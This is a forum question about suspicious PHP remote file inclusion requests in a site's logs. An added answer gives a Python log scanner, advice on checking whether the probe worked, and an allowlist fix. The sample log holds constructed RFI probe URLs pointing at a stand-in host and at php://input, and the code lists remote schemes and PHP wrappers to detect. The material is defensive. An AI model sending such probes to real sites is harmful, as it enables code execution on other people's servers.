Hey folks, I could really use some advice from someone with more PHP experience than me. I apologize in advance for all the screenshots–I didn’t know if it’d be advisable to post the text of some of this.
Today I saw this odd URL in the logs for a site I’m managing for someone (and this isn’t one of my sites, so it’s not hosted at DreamHost, so I can’t contact support about it–but I really am in over my head with this, so I’m hoping someone here will help me anyway).
Screenshot of URL (where the proper store URL would’ve been http://example.com/store.php). That URL was requested three times within a span of two minutes and ten seconds from three different IP addresses.
The http://ip address/dir/remote.txt? part of the URL yields a page that looks like it’s trying to inject a script that does…well, I have no idea what. Screenshot of that script. passthru() works sorta like exec(), right? I’m slightly freaked about what might be happening, especially after going to the URL that was being fetched by that script. I don’t really follow what’s happening in it.
I’m trying to figure out:
- what someone is attempting to exploit here
- how I might figure out whether the attempt succeeded or not
- what I need to go learn in order to make sure that the code I’m writing isn’t easily exploitable.
Nothing on the site was defaced, the crontab file is empty, and there’s nothing fishy-looking in the tmp directory (but there wouldn’t be, would there, based on what I could make of the script in that screenshot?)
Any advice would be much appreciated…
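An added example for the "what is being exploited" and "how do I find out if it worked" questions (this is not code from the original post): the request shape described above, a query-string value that is itself a URL such as `http://ip/dir/remote.txt?`, is the classic probe for a PHP remote file inclusion (RFI) bug, where a script does something like `include($_GET['page'] . '.php')` and the trailing `?` turns the appended `.php` into a harmless query string on the attacker's server. The Python scanner below runs over a few constructed access-log lines (the parameter name `page`, the IP addresses, timestamps, sizes and user agents are all made up for the example) and flags any request whose parameter value is a remote URL or a PHP stream wrapper, then groups the hits by payload so the "same URL from several IPs in a short window" pattern stands out.

```python
"""Scan web-server access logs for remote file inclusion (RFI) probes.

Added example, not from the original post. Parses Apache/nginx "combined"
log lines and flags any query-string parameter whose value is a remote URL
(http://, https://, ftp://) or a PHP stream wrapper (php://, data:, ...),
which is how include()/require() get pointed at attacker-controlled code.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Prefix of a "combined" log line: ip ident user [ts] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Values that make include()/require() read code from somewhere other than a local file.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")
PHP_WRAPPERS = ("php://", "data:", "expect://", "phar://")

# Constructed sample log (documentation IP ranges, made-up dates and sizes).
SAMPLE_LOG = """\
203.0.113.10 - - [12/Mar/2010:14:02:11 +0000] "GET /store.php?page=http://198.51.100.7/dir/remote.txt? HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
203.0.113.22 - - [12/Mar/2010:14:03:40 +0000] "GET /store.php?page=http%3A%2F%2F198.51.100.7%2Fdir%2Fremote.txt%3F HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"
203.0.113.31 - - [12/Mar/2010:14:04:21 +0000] "GET /store.php?page=php://input HTTP/1.1" 500 221 "-" "-"
192.0.2.5 - - [12/Mar/2010:14:05:02 +0000] "GET /store.php?page=catalog HTTP/1.1" 200 5123 "http://example.com/" "Mozilla/5.0"
192.0.2.6 - - [12/Mar/2010:14:05:30 +0000] "GET /index.php HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""


def is_remote_value(value):
    """True if a parameter value would make include() fetch non-local code."""
    v = value.strip().lower()
    return v.startswith(REMOTE_SCHEMES) or v.startswith(PHP_WRAPPERS)


def parse_line(line):
    """Return the interesting fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_rfi_attempts(lines):
    """Return one hit dict per (request, parameter) whose value looks like an RFI payload."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path, _, query = rec["target"].partition("?")
        # parse_qsl percent-decodes, so "http%3A%2F%2F..." is caught as well as the plain form.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if is_remote_value(value):
                hits.append({
                    "ip": rec["ip"], "ts": rec["ts"], "path": path,
                    "param": name, "value": value, "status": rec["status"],
                })
    return hits


def summarize_by_value(hits):
    """Map each distinct payload to the set of source IPs that sent it."""
    by_value = defaultdict(set)
    for h in hits:
        by_value[h["value"]].add(h["ip"])
    return dict(by_value)


if __name__ == "__main__":
    found = find_rfi_attempts(SAMPLE_LOG.splitlines())
    for h in found:
        print(f'{h["ts"]} {h["ip"]} {h["path"]} {h["param"]}={h["value"]!r} -> {h["status"]}')
    for value, ips in summarize_by_value(found).items():
        print(f"{value!r} sent from {len(ips)} IP(s): {sorted(ips)}")
```

Two caveats on reading the output. First, the HTTP status and response size tell you almost nothing about success: if the include worked, the injected code ran on the server and the page may still have returned 200 with its usual size. Whether it could have worked depends on two things you can check directly: whether `store.php` (or something it includes) actually passes a request parameter into `include`, `require`, `eval`, `passthru`, `system` or similar (grep the code for those calls), and whether the PHP build allows URLs there at all (`php -i | grep allow_url`; `allow_url_include` has defaulted to off since PHP 5.2, and without it `include('http://...')` fails). `passthru()` does run a shell command like `exec()` and `system()`, but it streams the raw output straight to the client, which is why it shows up in these injected scripts. Second, the fix is not to filter out `http://` in the parameter: map the parameter onto a fixed allowlist of page names on the server side and reject anything else, so the user never supplies a path at all.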